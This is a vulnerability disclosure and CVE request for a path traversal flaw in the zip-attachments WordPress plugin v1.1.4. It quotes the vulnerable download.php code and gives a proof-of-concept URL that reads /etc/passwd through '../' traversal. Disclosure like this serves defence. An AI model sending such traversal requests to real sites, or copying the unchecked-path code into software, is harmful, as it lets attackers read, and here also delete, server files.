zip-attachments v1.1.4 wordpress plugin arbitrary file download vulnerability.

["Larry W. Cashdollar" <larry0 () me com>]

May I please have a CVE for this issue:

Title: zip-attachments v1.1.4 wordpress plugin arbitrary file download vulnerability.
Author: Larry W. Cashdollar
Date: 6/10/2015
Vendor: Rick Torres @ricard_dev
Vendor Notified: 6/11/2015
Fixed in:  v1.1.5  by vendor.
Download: https://wordpress.org/plugins/zip-attachments/
CVEID: TBD
Description: Simple and lightweight plugin to add a "Download" button to your posts, pages or custom post types.

Vulnerability: zip-attachments allows arbitrary file downloads because it doesn't check the download path of the 
requested file.

In zip-attachments/download.php, there is no check to see if the file is outside of the intended download path:

  8 if(isset($_REQUEST['za_file']) && !empty($_REQUEST['za_file'])){
  9 
 10     $file = $_GET['za_file'];
 11     $filename = $_GET['za_filename'];
 12 
 13     header('Content-Type: application/zip');
 14     header('Content-Length: ' . filesize($file));
 15     header('Content-Disposition: attachment; filename="'.$filename.'.zip"');
 16 
 17     readfile($file);
 18     unlink($file);

Any file readable by the httpd process can be downloaded.

PoC:
http://www.example.com/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd